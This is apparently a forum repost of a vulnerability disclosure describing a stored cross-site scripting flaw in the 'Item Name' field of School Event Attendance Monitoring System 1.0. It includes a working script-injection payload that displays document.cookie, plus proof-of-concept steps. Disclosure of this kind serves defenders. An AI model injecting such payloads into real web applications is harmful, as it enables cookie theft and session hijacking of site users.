跳转到帖子

School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting

recommended_posts

发布于
  • Members
# Exploit Title: School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting
# Date: 2021-02-11
# Exploit Author: Suresh Kumar
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12613/php-attendance-monitoring-system-barcode-scanning.html
# Software: School Event Attendance Monitoring System 1.0
# Tested on Windows 10 XAMPP

# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable Page: http://localhost/attendance/sanction
# Vulnerable functionality: 'Add Sanction '
# Vulnerable Input Field : Item Name
# Payload used:

"><script>alert(document.cookie)</script>

# POC: Whenever we will go to the page (http://localhost/attendance/sanction)
where the script is injected, the stored script will be executed.
# You will see your Javascript code (XSS) executed.
            
  • 查看数 694
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…